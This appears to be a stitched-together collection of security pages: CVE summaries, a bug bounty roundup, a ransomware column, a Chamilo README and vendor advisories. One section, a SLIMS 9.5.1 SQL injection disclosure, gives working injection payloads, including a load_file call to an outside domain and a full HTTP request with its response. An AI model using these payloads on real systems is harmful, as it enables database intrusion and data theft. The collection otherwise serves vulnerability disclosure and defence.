The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes Ubiquiti airFiber AF2X Radio firmware version 3.2.2 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-the-middle (MITM) attack to modify the new firmware image and bypass the checksum verification.

CVE-2023-23119

New web targets for the discerning hacker

New web targets for the discerning hacker

Bug Bounty hunters who’d like a little more financial predictability in their lives were given that option this month, with a new program from Intigriti offering payment by the hour.

A combination of bug bounty hunting and penetration testing models, there will be payment for the number of hours a participant spends searching for vulnerabilities, as well as a capped reward for individual bugs. In a pre-launch pilot, hackers collectively earned more than €100,000 ($106,000).

In payout news, a hacker who goes by the name ‘Stealthy’ netted $36,000 in bug bounties after uncovering critical HTTP request smuggling vulnerabilities affecting three of Apple’s core web applications.

Queue poisoning attacks enabled data disclosure and account takeover with no user interaction required, Stealth explained. The bugs affected servers for business.apple.com, school.apple.com, and mapsconnect.apple.com.

Two hacking contests earlier this month also saw researchers earn a bumper crop of rewards.

There were payouts totalling $400,000 at the second edition of Pwn2Own Miami for dozens of previously undiscovered exploits targeting industrial control systems, for instance.

Daan Keuper and Thijs Alkemade were crowned Masters of Pwn with 90 points and $90,000 accrued for their team, while rewards were given for previously unknown zero-day vulnerabilities in industrial control platforms.

Meanwhile, ‘Hack Me I’m Famous’, an overnight hackathon held by bug bounty platform YesWeHack, saw 40 bug bounty hunters compete to find vulnerabilities in French scale-ups or start-ups valued at more than $1 billion.

Of 109 vulnerability reports, 30% were rated as either high or critical severity bugs, with one researcher netting the maximum payout of €10,000.

And finally, an access control vulnerability in open source scheduling platform Easy!Appointments was found to give unauthenticated attackers easy access to personally identifiable information. An unprotected API could expose names, places, and times of bookings made using the app.

The find earned Francesco Carlucci, founder of vulnerability notification platform OpenCIRT, a “small” reward.

**The latest bug bounty programs for May 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**AEX**

Program provider:  
HackenProof

Program type:  
Public

Max reward:  
$5,000

Outline:  
Digital asset exchange AEX is looking to find critical bugs in its web, mobile, and API targets.

Notes:  
There is an extensive list of out-of-scope targets that must be avoided. As ever, it’s worth taking a look before you start hunting.

Check out the AEX bug bounty page at HackenProof for more details

**American Systems**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$3,000

Outline:  
Management consulting services firm American Systems said it “looks forward to working with the security community to find vulnerabilities in order to keep our businesses and customers safe”.

Notes:  
Rewards are based on severity per CVSS. However, the company said these are “general guidelines, and reward decisions are up to the discretion of American Systems”.

Check out the American Systems’bug bounty page at HackerOne for more details

**ExpressVPN – enhanced**

Program provider:  
Bugcrowd

Program type:  
Public

Max reward:  
$100,000

Outline:  
ExpressVPN has increased its top reward – which is now 10 times higher than the previous highest bounty – with $10,000 now on offer for valid critical flaws unearthed in ExpressVPN’s TrustedServer.

Notes:  
ExpressVPN built TrustedServer to mitigate the risks posed by traditional server management and the elevated bug bounty reward supplements an independent security audit by PwC.

Read the related ExpressVPN press release for more details

**IoTex**

Program provider:  
HackenProof

Program type:  
Public

Max reward:  
$15,000

Outline:  
IoTeX is “the leading decentralized network powering the future of web3 and machine economy (MachineFi)”. It is asking researchers to find vulnerabilities in its web domains, mobile apps, and APIs.

Notes:  
The top three vulnerabilities in scope are business logic issues, payments manipulation, and remote code execution.

Check out the IoTex bug bounty page at HackenProof for more details

**KAYAK**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$5,000

Outline:  
Travel company KAYAK is asking for reports related to vulnerabilities in its website, as well as a number of its subsidiaries.

Notes:  
Not all of KAYAK’s subsidiaries are in scope, so make sure to confirm before hacking.

Check out the KAYAK bug bounty page at HackerOne for more details

**Mastadon – enhanced**

Program provider:  
Intigriti

Program type:  
Public

Max reward:  
€20,000

Outline:  
Mastodon has increased its maximum payout bounty to €20,000.

Notes:  
The bug bounty platform announced on Twitter that the first hacker to claim the new maximum reward will also be gifted with a swag package. Don’t walk, run!

Check out the Mastodon bug bounty page at Intigriti for more details

**SHEIN**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$2,000

Outline:  
Fast fashion retailer SHEIN has launched a bug bounty program that includes targets related to its sister company Romwe.

Notes:  
This program comes after a successful, limited program last year.

Check out the SHEIN bug bounty page at HackerOne for more details

**Sorare**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$10,000

Outline:  
Sorare is a global fantasy football game where managers can trade official digital collectibles.

Notes:  
Three assets are in scope: Sorare.com plus Sorare’s API and WebSocket domain.

Check out the Sorare bug bounty page at HackerOne for more details

**Other bug bounty and VDP news this month**

*   Pfizer has launched a vulnerability disclosure program with HackerOne, because looking for “potential issues helps us ensure the security and privacy of customers and data”.
*   Love swag? Who doesn’t! Intigriti has been giving away monthly swag bags on Twitter – see here.

Additional reporting by Emma Woollacott.

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for April 2022

Bug Bounty Radar // The latest bug bounty programs for May 2022

Lower cybersecurity awareness coupled with vulnerable OT gear makes manufacturers tempting targets, but zero trust can blunt attackers’ advantages.

Everyone in information security knows ransomware actors target different industries for different reasons. Some are seen as flush with cash. Some have obvious reasons for needing to resume operations ASAP. Others are just widely recognized as poorly protected.

But did you know that manufacturers pay the highest ransoms of any vertical?

A recent report spelled it out in stark detail. Across all industries, the average ransom paid is a hefty $812,360. Yet for manufacturing, that average skyrockets to a stunning $2,036,189 — about two and a half times the average.

Attackers prefer easy, weak targets as a rule. So what is it about manufacturing that qualifies such organizations as easy or weak?

First, it’s worth asking whether manufacturers are targeted more often, or if they just happen to fall victim more frequently due to inherent factors like outdated tech or lack of cybersecurity awareness. The next interesting question is why they tend to shell out sums so egregiously above what organizations in other verticals do.

As a chief information security officer (CISO) with years of experience leading cybersecurity operations for a global manufacturer, I have some immediate explanations in mind. Here are some of the factors that inevitably contribute:

*   Manufacturers typically have slim profit margins and rely on steady productivity to compensate.
*   Manufacturers know they won’t make much profit on any one iteration of manufactured goods, so high volume is necessary to hit business targets over time. But high volume requires regular output, uninterrupted by slowdowns or complete outages.
*   While organizations in industries with fatter margins might be able to tolerate an extended outage, manufacturers typically can’t. The result is exceptional pressure on manufacturers to pay ransoms and pay them quickly. That’s why attackers, conscious of all this context and the leverage it gives them, may feel emboldened to charge higher ransoms than they would in other industries.

**Manufacturing Suffers From Low Cybersecurity Awareness**

Many factory workers don’t routinely use IT gear like desktop computers, laptops, or tablets. Some may not even have corporate-issued email addresses. Additionally, very few have received extensive training on current cyber threats, and as such, wouldn’t know how to recognize, react, or, report them to their IT team once they’re spotted.

Think of the most standard, low-hanging fruit of cybersecurity awareness training: the phishing simulation. Even if email addresses are provided (far from a given, especially in manufacturing facilities in the developing world), it’s simply unreasonable to expect employees to develop an understanding of the attack chain that may lead from a phishing email to a compromise by a ransomware actor.

These factors increase an organization’s total attack surface. They make the manufacturer more apparent to attackers and more likely to fall prey to attacks if they appear.

**Manufacturing Data Can Be Extraordinarily Valuable**

Imagine that a drywall manufacturer has a unique proprietary method for creating drywall that dries quickly and can be rapidly shipped on demand, yielding a competitive advantage. This type of intellectual property, once compromised, can easily be held for an exceptionally high ransom, because the entire business model would be in jeopardy if it were to leave the company.

Similar concerns can apply to data involved in market timing. Suppose a clothing manufacturer planned to release a new line in the spring based on a combination of colors its market research found would be in high demand. The company may have orchestrated its entire spring-season marketing and supply chain ordering on that basis. Attackers could hold such information for a substantial ransom, because if it were given to competitors, those competitors may get to market first with a competing product, raking in all the expected benefits.

Operational technology (OT) used by manufacturers typically involves many assets (pumps, generators, turbines, etc.) that are on the IT infrastructure — and thus accessible to attackers — yet difficult to patch or secure. Sometimes, even if an asset can be secured, only its manufacturer can secure it without voiding the asset’s warranty.

Being outdated and insecure doesn’t always make them less valuable to the organization, however. Many times, these are legacy systems are required for a basic function, with no adequate substitute available, so the organization continues using them. Attackers often take advantage in such cases to maximize their leverage in charging ransoms.

Suppose an attacker is interested in compromising a Fortune 500 bank. If that bank is a client of a manufacturer whose security is less sophisticated than the bank’s, attackers could use the manufacturer as a stepping stone.

Additionally, manufacturing organizations often simply don’t realize how many third parties (partners, clients, suppliers) can access their networks and data. They may grant network privileges too easily, and in many cases, those privileges give unrestricted access instead of being limited to just the assets required for business purposes.

**Better Security Is Available Today**

I know from experience that manufacturers can significantly reduce their attack surface by adopting zero-trust principles. In turn, this makes it less likely that attackers opportunistically probing the open Internet for weaknesses will discover the organization.

If the organization is discovered, zero trust eliminates an adversary’s ability to move laterally across a network, where they could discover the sort of valuable data that would give them leverage over their target.

Adopting a zero trust approach helps an organization to:

*   Rigorously validate the identity of all participants in a network transaction

*   Obscure from the public Internet the true IP addresses of all assets at any manufacturing facility (or combination of them) via a buffering service

*   Segment the network and support application microtunneling, limiting any possible access by attackers

*   Apply identical policies to public clouds and remote workers, with the ability to scale automatically over time as the network topology changes

These and other techniques, once implemented, can help manufacturers reduce the risk of a breach, lessen their exposure should a breach occur, and minimize the business impact of any successful attack. Best of all, they will help manufacturers hang on to more of their hard-earned profits.

Read more _Partner Perspectives_ from Zscaler

Paying Ransom: Why Manufacturers Shell Out to Cybercriminals

chamilo-lms v1.11.14 is affected by a Cross Site Scripting (XSS) vulnerability in /plugin/jcapture/applet.php if an attacker passes a message hex2bin in the cookie.

**Chamilo 1.11.x**

![Build Status](https://camo.githubusercontent.com/aea4dedcfeccd389b971dbd8260df22698f6efffd894dfa41ee12029a54d28b1/68747470733a2f2f7472617669732d63692e6f72672f6368616d696c6f2f6368616d696c6f2d6c6d732e7376673f6272616e63683d312e31312e78) ![Scrutinizer Code Quality](https://camo.githubusercontent.com/5c8291b3300e9c54ce9a0ddc20cf6f01a4eab18b7b3795b490d373a3072e1845/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f7175616c6974792d73636f72652e706e673f623d312e31312e78) ![Code Coverage](https://camo.githubusercontent.com/f57a179067358901bced3e99e3e211a7641cd193d7e7ab373f34425c0b228896/68747470733a2f2f7363727574696e697a65722d63692e636f6d2f672f6368616d696c6f2f6368616d696c6f2d6c6d732f6261646765732f636f7665726167652e706e673f623d312e31312e78) ![Bountysource](https://camo.githubusercontent.com/59eaeb4f05c9ff700681d0fd8ec30cb86a82f1a4c65efbf82ae2978ba71f16e2/68747470733a2f2f7777772e626f756e7479736f757263652e636f6d2f62616467652f7465616d3f7465616d5f69643d3132343339267374796c653d726169736564) ![Code Consistency](https://camo.githubusercontent.com/3bc66755dc2e12f4a374fb26d24ba33881ac3886baf05b5cf431df5b043d70ee/68747470733a2f2f737175697a6c6162732e6769746875622e696f2f5048505f436f6465536e69666665722f616e616c797369732f6368616d696c6f2f6368616d696c6f2d6c6d732f67726164652e737667) ![CII Best Practices](https://camo.githubusercontent.com/cece3b502cea381cfa2f8f9bfdc9bccf8a08d0353bad51e023691d49f32994d2/68747470733a2f2f626573747072616374696365732e636f7265696e6672617374727563747572652e6f72672f70726f6a656374732f3136362f6261646765) ![Codacy Badge](https://camo.githubusercontent.com/2657ea94f3334bacaab31f95ee9e7b8d959c5a0a832c6920bc04ed047b71f493/68747470733a2f2f6170692e636f646163792e636f6d2f70726f6a6563742f62616467652f47726164652f3838653933346161623266333462623761303339376136663632623037386232)

**Installation**

This installation guide is for development environments only.

**Install PHP, a web server and MySQL/MariaDB**

To run Chamilo, you will need at least a web server (we recommend Apache2 for commodity reasons), a database server (we recommend MariaDB but will explain MySQL for commodity reasons) and a PHP interpreter (and a series of libraries for it). If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

    sudo apt-get install apache2 mysql-server php libapache2-mod-php php-gd php-intl php-curl php-json php-mysql php-zip composer
    

**Install Git**

The development version 1.11.x requires you to have Git installed. If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type

**Install Composer**

To run the development version 1.11.x, you need Composer, a libraries dependency management system that will update all the libraries you need for Chamilo to the latest available version.

Make sure you have Composer installed. If you do, you should be able to launch "composer" on the command line and have the inline help of composer show a few subcommands. If you don't, please follow the installation guide at https://getcomposer.org/download/

**Download Chamilo from GitHub**

Clone the repository

    sudo mkdir chamilo-1.11
    sudo chown -R `whoami` chamilo-1.11
    git clone -b 1.11.x --single-branch https://github.com/chamilo/chamilo-lms.git chamilo-1.11
    

Checkout branch 1.11.x

    cd chamilo-1.11
    git checkout --track origin/1.11.x
    git config --global push.default current
    

**Update dependencies using Composer**

From the Chamilo folder (in which you should be now if you followed the previous steps), launch:

If you face issues related to missing JS libraries, you might need to ensure that your web/assets folder is completely re-generated. Use this set of commands to do that:

    rm composer.lock
    rm -rf web/ vendor/
    composer clear-cache
    composer update
    

This will take several minutes in the best case scenario, but should definitely generate the missing files.

**Change permissions**

On a Debian-based system, launch:

    sudo chown -R www-data:www-data app main/default_course_document/images main/lang web
    

**Configure the web server**

Enable the Apache web server module "rewrite" :

    sudo a2enmod rewrite
    sudo systemctl restart apache2.service
    

Chamilo's .htaccess must be obeyed. Create /etc/apache2/conf-available/htaccessForChamilo.conf with these lines :

    <Directory /var/www/html/chamilo-lms>
    	AllowOverride All
    </Directory>
    

then enable it :

    sudo a2enconf htaccessForChamilo
    sudo systemctl reload apache2.service
    

If you just installed missing PHP extensions using apt, you must restart the web server to get them loaded :

    sudo systemctl restart apache2.service
    

**Start the installer**

In your browser, load the Chamilo URL. You should be automatically redirected to the installer. If not, add the "main/install/index.php" suffix manually in your browser address bar. The rest should be a matter of simple OK > Next > OK > Next...

**Upgrade from 1.10.x**

1.11.0 is a major version. It contains a series of new features, that also mean a series of new database changes in regards with versions 1.10.x. As such, it is necessary to go through an upgrade procedure when upgrading from 1.10.x to 1.11.x.

The upgrade procedure is relatively straightforward. If you have a 1.10.x initially installed with Git, here are the steps you should follow (considering you are already inside the Chamilo folder):

    git fetch --all
    git checkout origin 1.11.x
    

Then load the Chamilo URL in your browser, adding "main/install/index.php" and follow the upgrade instructions. Select the "Upgrade from 1.10.x" button to proceed.

If you have previously updated database rows manually, you might face issue with FOREIGN KEYS during the upgrade process. Please make sure your database is consistent before upgrading. This usually means making sure that you have to delete rows from tables referring to rows which have been deleted from the user or access\_url tables. Typically:

    DELETE FROM access\_url\_rel\_course WHERE access\_url\_id NOT IN (SELECT id FROM access\_url);

**Upgrading from non-Git Chamilo 1.10**

In the _very unlikely_ case of upgrading a "normal" Chamilo 1.10 installation (done with the downloadable zip package) to a Git-based installation, make sure you delete the contents of a few folders first. These folders are re-generated later by the `composer update` command. This is likely to increase the downtime of your Chamilo portal of a few additional minutes (plan for 10 minutes on a reasonnable internet connection).

    rm composer.lock
    rm -rf web/*
    rm -rf vendor/*
    

**For developers and testers only**

This section is for developers only (or for people who have a good reason to use a development version of Chamilo), in the sense that other people will not need to update their Chamilo portal as described here.

**Updating code**

To update your code with the latest developments in the 1.11.x branch, go to your Chamilo folder and type:

If you have made customizations to your code before the update, you will have two options:

*   abandon your changes (use "git stash" to do that)
*   commit your changes locally and merge (use "git commit" and then "git pull")

You are supposed to have a reasonable understanding of Git in order to use Chamilo as a developer, so if you feel lost, please check the Git manual first: http://git-scm.com/documentation

**Updating your database from new code**

Since the 2015-05-27, Chamilo offers the possibility to make partial database upgrades through Doctrine migrations.

To update your database to the latest version, go to your Chamilo root folder and type

    php bin/doctrine.php migrations:migrate --configuration=app/config/migrations.yml
    

If you want to proceed with a single migration "step" (the steps reside in src/Chamilo/CoreBundle/Migrations/Schema/V110/), then check the datetime of the version and type the following (assuming you want to execute Version20150527120703)

    php bin/doctrine.php migrations:execute 20150527120703 --up --configuration=app/config/migrations.yml
    

You can also print the differences between your database and what it should be by issuing the following command from the Chamilo base folder:

    php bin/doctrine.php orm:schema-tool:update --dump-sql
    

**Contributing**

If you want to submit new features or patches to Chamilo, please follow the Github contribution guide https://guides.github.com/activities/contributing-to-open-source/ and our CONTRIBUTING.md file. In short, we ask you to send us Pull Requests based on a branch that you create with this purpose into your repository forked from the original Chamilo repository.

**Documentation**

For more information on Chamilo, visit https://1.11.chamilo.org/documentation/index.html

CVE-2021-43687: GitHub - chamilo/chamilo-lms at v1.11.14

Senayan Library Management System version 9.5.1 suffers from a remote SQL injection vulnerability.

## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.06.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.5.1/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'was submitted in the manual insertion `point 4` testing.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can execute a very dangerous `subquery` to view verysensitive information.## STATUS: HIGH Vulnerability[+] Payload:```MySQLGET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaaHTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;SenayanMember=schm4nbtgbb5i1tbeonr6cav3uConnection: close```[+] Response:```MySQLHTTP/1.1 200 OKDate: Tue, 06 Dec 2022 13:51:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockContent-Length: 4120Connection: closeContent-Type: text/html; charset=UTF-8<!doctype html><html><head><title>Loan Report by Class Report</title>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/jquery.js"></script>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/gui.js"></script></head><body><div id="pageContent">  <div class="mb-2">Loan Recap By Class<strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<strong>2002</strong> <a class="s-btn btn btn-default printReport"onclick="window.print()" href="#">Print Current Page</a><ahref="../xlsoutput.php" class="s-btn btn btn-default"target="_BLANK">Export to spreadsheet format</a>    <a class="s-btn btn btn-info notAJAX openPopUp"href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"width="700" height="530" title="Loan Recap By Class">Show inchart/plot</a></div><table class="s-table table table-sm table-bordered"><tr><thclass="dataListHeaderPrinted">Classification</th><thclass="dataListHeaderPrinted">Jan</th><thclass="dataListHeaderPrinted">Feb</th><thclass="dataListHeaderPrinted">Mar</th><thclass="dataListHeaderPrinted">Apr</th><thclass="dataListHeaderPrinted">May</th><thclass="dataListHeaderPrinted">Jun</th><thclass="dataListHeaderPrinted">Jul</th><thclass="dataListHeaderPrinted">Aug</th><thclass="dataListHeaderPrinted">Sep</th><thclass="dataListHeaderPrinted">Oct</th><thclass="dataListHeaderPrinted">Nov</th><thclass="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div><div class="loader"></div><script type="text/javascript">    // if we are inside iframe    jQuery(document).ready(function () {          });</script></body></html>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)## Proof and Exploit:[href](https://streamable.com/gthu91)## Time spent`04:00:00`

Senayan Library Management System 9.5.1 SQL Injection

Red Hat Security Advisory 2024-5365-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include double free and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5365.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2024:5365-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5365  
Issue date:         2024-08-14  
Revision:           03  
CVE Names:          CVE-2021-47383  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete (CVE-2024-26897)

* kernel: wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work (CVE-2024-27052)

* kernel: wifi: ath10k: fix NULL pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() (CVE-2023-52651)

* kernel: wifi: cfg80211: check A-MSDU format more carefully (CVE-2024-35937)

* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)

* kernel: net: CVE-2024-36971 kernel: UAF in network route management (CVE-2024-36971)

* kernel: net/mlx5: Add a timeout to acquire the command queue semaphore (CVE-2024-38556)

* kernel: stm class: Fix a double free in stm_register_device() (CVE-2024-38627)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.2 ad hoc schedule build (JIRA:RHEL-52875)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47383

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265653  
https://bugzilla.redhat.com/show_bug.cgi?id=2275655  
https://bugzilla.redhat.com/show_bug.cgi?id=2275742  
https://bugzilla.redhat.com/show_bug.cgi?id=2278417  
https://bugzilla.redhat.com/show_bug.cgi?id=2278435  
https://bugzilla.redhat.com/show_bug.cgi?id=2278519  
https://bugzilla.redhat.com/show_bug.cgi?id=2278989  
https://bugzilla.redhat.com/show_bug.cgi?id=2281057  
https://bugzilla.redhat.com/show_bug.cgi?id=2281257  
https://bugzilla.redhat.com/show_bug.cgi?id=2281272  
https://bugzilla.redhat.com/show_bug.cgi?id=2281647  
https://bugzilla.redhat.com/show_bug.cgi?id=2281821  
https://bugzilla.redhat.com/show_bug.cgi?id=2282357  
https://bugzilla.redhat.com/show_bug.cgi?id=2282719  
https://bugzilla.redhat.com/show_bug.cgi?id=2282720  
https://bugzilla.redhat.com/show_bug.cgi?id=2284474  
https://bugzilla.redhat.com/show_bug.cgi?id=2284511  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2293402  
https://bugzilla.redhat.com/show_bug.cgi?id=2293443  
https://bugzilla.redhat.com/show_bug.cgi?id=2293444  
https://bugzilla.redhat.com/show_bug.cgi?id=2293461  
https://bugzilla.redhat.com/show_bug.cgi?id=2293700

Red Hat Security Advisory 2024-5365-03

Improper Authorization vulnerability in ForgeRock Inc. Access Management allows Authentication Bypass.This issue affects Access Management: from 6.5.0 through 7.2.0.



Security Advisory

ForgeRock Identity Platform

Does not apply to Identity Cloud

Last updated Apr 13, 2023

A security vulnerability has been discovered in supported versions of Access Management (AM). This vulnerability affects all current versions of AM, and could be present in older unsupported versions. You should secure your deployments at the earliest opportunity as outlined in this security advisory.

4 readers recommend this article

This security advisory only applies to software deployments of the ForgeRock Identity Platform. All relevant patches from this advisory have already been applied to ForgeRock Identity Cloud.

**January 25, 2023**

A security vulnerability has been discovered in supported versions of AM. This vulnerability affects all current versions of AM, and could be present in older unsupported versions.

The maximum severity of issues in this advisory is **Critical**.

The advice is to upgrade to the latest version to fix these issues. Alternatively, if that’s not possible at this time, you can apply one of the patches to mitigate these issues.

Details about this vulnerability are deliberately kept to a minimum to protect your deployments and prevent someone trying to exploit them in the field. Please do not ask for steps to reproduce for the same reasons.

You can download patches from Backstage for the following AM versions:

*   AM 6.5.5
*   AM 7.1.2 (updated to #202301)
*   AM 7.1.3 (updated to #202301)
*   AM 7.2.0 (updated to #202301)

Customers who obtained a patch with 202207 in the name for AM 7.x  need to replace those patches with a 202301 version. 

For Customers who had already raised a ticket for a custom 7.x patch, updated 202301 versions of those patches are being issued via the original support tickets.

Additional details are available in AM Security Advisory #202301.

See How do I install an AM patch (All versions) supplied by ForgeRock support? for further information on deploying the patch. 

If you need a patch for a different version or you have existing patches, please raise a support ticket to obtain an updated patch; you should provide details of your existing patches when you raise the ticket to ensure we have the relevant details. See How do I use the patchinfo utility to check what patches are installed for AM or IG (All versions)? or How do I check what patches are installed for ForgeRock products? for further information.

**Issue #202207-01 - Improper Authorization (CWE-285)**

Affected versions

AM (all supported versions and perhaps older unsupported versions)

Fixed versions

AM 7.2.1, AM 7.3

Component

Core Server

Severity

Critical

**Description:**

A critical severity Improper Authorization (CWE-285) vulnerability has been discovered in supported versions of AM that can lead to user account impersonation and takeover.

**Mitigation:**

Due to the sensitive nature of this issue, please contact ForgeRock support by raising a ticket via Backstage. Please include "AM Security Advisory #202207" in the ticket subject. 

**Resolution:**

Deploy the relevant patch.

**Change Log**

The following table tracks changes to the security advisory:

Date 

Description

April 13, 2023 

Made advisory available to everyone

April 5, 2023

Added fixed versions (AM 7.2.1, AM 7.3)

February 10, 2023

Updated content and added back updated patches for 7.1.2, 7.1.3 & 7.2.0

February 6, 2023

Expanded visibility of this advisory to partners

February 3, 2023

Removed AM 7.2.0 and AM 7.1.3 download links whilst these patches are updated

February 1, 2023

Removed AM 7.1.2 download link 

January 25, 2023

Initial release

Copyright and Trademarks Copyright © 2023 ForgeRock, all rights reserved.

CVE-2022-3748: AM Security Advisory #202207 | ForgeRock Backstage

The HMAC implementation (crypto/hmac.c) in the Linux kernel before 4.14.8 does not validate that the underlying cryptographic hash algorithm is unkeyed, allowing a local attacker able to use the AF_ALG-based hash interface (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm (CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by executing a crafted sequence of system calls that encounter a missing SHA-3 initialization.

CVE-2017-17806

The impact of this vulnerability is that Arista's EOS eAPI may skip re-evaluating user credentials when certificate based authentication is used, which allows remote attackers to access the device via eAPI.

